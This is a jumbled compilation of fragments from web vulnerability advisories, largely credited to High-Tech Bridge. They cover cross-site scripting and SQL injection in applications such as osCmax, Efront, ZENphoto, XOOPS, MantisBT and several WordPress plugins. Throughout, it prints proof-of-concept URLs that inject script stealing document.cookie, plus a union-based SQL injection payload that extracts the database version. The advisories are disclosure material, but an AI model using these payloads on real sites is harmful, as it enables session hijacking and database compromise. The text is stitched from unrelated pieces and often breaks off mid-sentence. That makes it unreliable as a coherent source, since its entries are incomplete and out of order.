script code
The following PoC code is available:
http://[host]/contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29%2%29%29%29%20+--+
3) Input passed via the "mode" GET parameter to contact_support.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1) Input passed to the "clientid" parameter in "www/admin/banner-acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php", "www/admin/advertiser-campaigns.php", "www/admin/campaign-banners.php", and "www/admin/banner-activate.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
2) Input passed to the "orderdirection" and "listorder" parameters in "www/admin/userlog-index.php" and "www/admin/stats.php" is not properly sanitised before being returned to the user. This can be
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/admin/login.php?action=process" method="post" name="main" id="main">
Details:
========
Multiple persistent input validation vulnerabilities are detected in Astaro Command Center v2.x.
The bugs allow local privileged attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires user interaction & minimum restricted access to the panel.
Vulnerable Module(s):
[+] Configuration - Networks Definition
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Efront, which can be exploited to perform SQL injection and cross-site scripting attacks.
1) Input passed via the "course" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?ctg=lesson_info&lessons_ID=1&course=%27%20onmouseover%3dalert%28document.cookie%29%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in PHPShop CMS Free, which can be exploited to perform cross-site scripting and SQL injection attacks.
1) Input appended to the URL after multiple files is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The following PoC code is available:
http://[host]/phpshop/admpanel/banner/adm_baner_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/phpshop/admpanel/gbook/adm_gbook_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in N-13 News, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the GET "id" parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?id=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Open-Realty, which can be exploited to perform cross-site scripting and SQL Injection attacks.
1) Input passed via the "name", "email", "friend_email", "subject", "message" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
<form action="http://[host]/index.php?action=contact_friend&popup=yes&listing_id=1" method="post">
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pretty Link WordPress Plugin, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the "min_date" GET parameter to /wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
For demonstration or reproduce ...
Code Review: Users - User Listing
<div style="display: inline; vertical-align: middle; white-space: nowrap; padding: 4px 2px 4px 0px;">>"<INCLUDE PERSISTENT SCRIPTCODE HERE!!!>
</div> <span>Known IP addresses of user '>"<INCLUDE PERSISTENT SCRIPTCODE HERE!!!>'</iframe></span>
Code Review: Add New Network Listing
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in miniblog, which can be exploited to perform cross-site scripting & cross-site request forgery attacks.
1) Input passed via the GET "post_list" parameter to /adm/list.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/adm/list.php?post_list=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Browser CRM, which can be exploited to perform cross-site scripting and SQL injection attacks.
1) Input appended to the URL after multiple files is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The following PoC code is available:
http://[host]/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires the attacker to be logged-in and have access to "Manage Albums" function.
3) Multiple XSS in ZENphoto: CVE-2012-0995
3.1 Input passed via the "msg" GET parameter to /zp-core/admin.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC is available:
http://[host]/zp-core/admin.php?action=external&error&msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
1) Multiple Cross-Site Scripting (XSS) in XOOPS: CVE-2012-0984
1.1 Input passed via the "to_userid" POST parameter to /modules/pm/pmlite.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
<form action='http://[host]/modules/pm/pmlite.php' method="post">
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Dotclear, which can be exploited to perform Cross-Site Scripting (XSS) attacks.
1) Cross-Site Scripting (XSS) in Dotclear: CVE-2012-1039
1.1 Input passed via the "login_data" POST parameter to /admin/auth.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/admin/auth.php" method="post">
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in All-in-One Event Calendar Plugin for WordPress, which can be exploited to perform Cross-Site Scripting (XSS) attacks.
1) Cross-Site Scripting (XSS) in All-in-One Event Calendar Plugin for WordPress: CVE-2012-1835
1.1 Input passed via the "title" GET parameter to /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1) Multiple Cross-Site Scripting (XSS) in Pligg CMS: CVE-2012-2436
1.1 Input passed via the arbitrary (any) GET parameter to /admin/admin_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/admin/admin_index.php?action=move&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admin/admin_index.php?action=minimize&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Details:
========
Multiple persistent Input Validation vulnerabilities are detected on Barracudas CudaTel Phone Application v3.0.028.001.
Local low privileged user accounts can implement/inject malicious script code to manipulate modules via persistent context
requests. When exploited by an authenticated user, the identified vulnerabilities can result in information disclosure via error,
session hijacking, access to available phone line services, manipulated persistent context execution out of the auto route listings.
Vulnerable Module(s):
[+] Automated Attendants
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BugFree, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the "ActionType" GET parameter to Bug.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/Bug.php?BugID=1&ActionType=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
sanitised before being used in an SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "login" and "password" parameters to index.php
is not properly sanitised before being displayed to the user. This can
be exploited to insert arbitrary HTML and script code, which will be
executed in a user's browser session in context of an affected site
when the malicious data is being viewed.
3) Input passed via the "art" parameter to index.php is not properly
sanitised before being used in an SQL query. This can be exploited to
--------------
Vulnerability:
--------------
1. The login page is vulnerable to cross site scripting.
2. script code can be embedded into messages.
3. script code can be embedded into milestones.
4. script code can be embedded into a users display name.
5. The application is vulnerable to cross site request forgery.
A project e.g. can be deleted with a simple GET request (see PoC).
Combined with the XSS vulnerabilities, the code can be embedded into
2) Multiple Cross-Site Scripting (XSS) in Piwigo: CVE-2012-2209
2.1 Input passed via the "section" GET parameter to admin.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/admin.php?page=configuration&section=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Traq, which can be exploited to perform cross-site scripting and sql injection attacks.
1) Input passed via the "edit" GET parameter is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in an administrator's browser session in context of affected website.
The following PoC code is available:
http://[host]/admincp/components.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/ticket_templates.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Details:
========
Multiple persistent input validation vulnerabilities are detected on
Kloxos LxCenter Server CP v6.1.10.
The bug allows a remote attacker to implement malicious script code on the
application side (persistent).
Successful exploitation of the vulnerability allows an attacker to
manipulate modules/context (persistent) & can
lead to session hijacking (user/mod/admin).
http://[host]/settings/settings_index.php?cal_alert=%27%20SQL_CODE_HERE&cal_first_hour=0&cal_interval=4&cal_last_hour=1&commentorder=0&csv_sep=%3b&date=Y-m-d&date_upd=Y-m-d&debug_exe=16&debug_id=1&debug_param=2&debug_sess=4&debug_solr=32&debug_sql=8&display=yes&dsrc=0&form_user_pref=1&mail=yes&mail_participation=yes&menu=text&public_fb=yes&rows=10&sel_display_days=1111111&submit=Validate&timeformat=12H&timezone=Africa%2fAbidjan&todo=todo_priority
Successful exploitation of these vulnerabilities requires the attacker to be registered and logged-in, as well as "magic_quotes_gpc" to be disabled.
8) Input passed via the "tf_delegation", "tf_ip", "tf_name" GET parameters to /host/host_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=%22%20onmouseover=alert%28document.cookie%29;%22&tf_ip=&tf_name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=&tf_ip=%22%20onmouseover=alert%28document.cookie%29;%22&tf_name=
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
1) Input passed via the "uniqcode" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?menu_no_top=eim&uniqcode=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in eShop for Wordpress, which can be exploited to perform cross-site scripting attacks against logged-in Wordpress Administrator.
1) Input passed via the "eshoptemplate" GET parameter to /wp-admin/admin.php (when "page" is set to "eshop-templates.php") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in an administrator's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in MantisBT, which can be exploited to perform cross-site scripting and local file inclusion attacks.
1) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Tine 2.0, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the "lang" GET parameter to /library/idnaconvert/example.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E